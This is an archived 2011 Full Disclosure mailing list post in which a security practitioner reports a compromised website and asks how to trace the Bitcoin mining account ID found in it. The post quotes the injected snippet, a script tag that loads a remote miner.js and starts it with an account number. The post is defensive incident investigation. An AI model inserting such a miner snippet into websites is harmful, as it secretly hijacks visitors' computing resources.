Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Compromised site using BitCoin

From: "James Lay" <jlay () slave-tothe-box net>
Date: Mon, 12 Dec 2011 10:11:36 -0700
Group,

Recently I ran across the below on a site:

<script src="hxxp://www.bitcoinplus.com/js/miner.js"
type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner(10215318);</script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: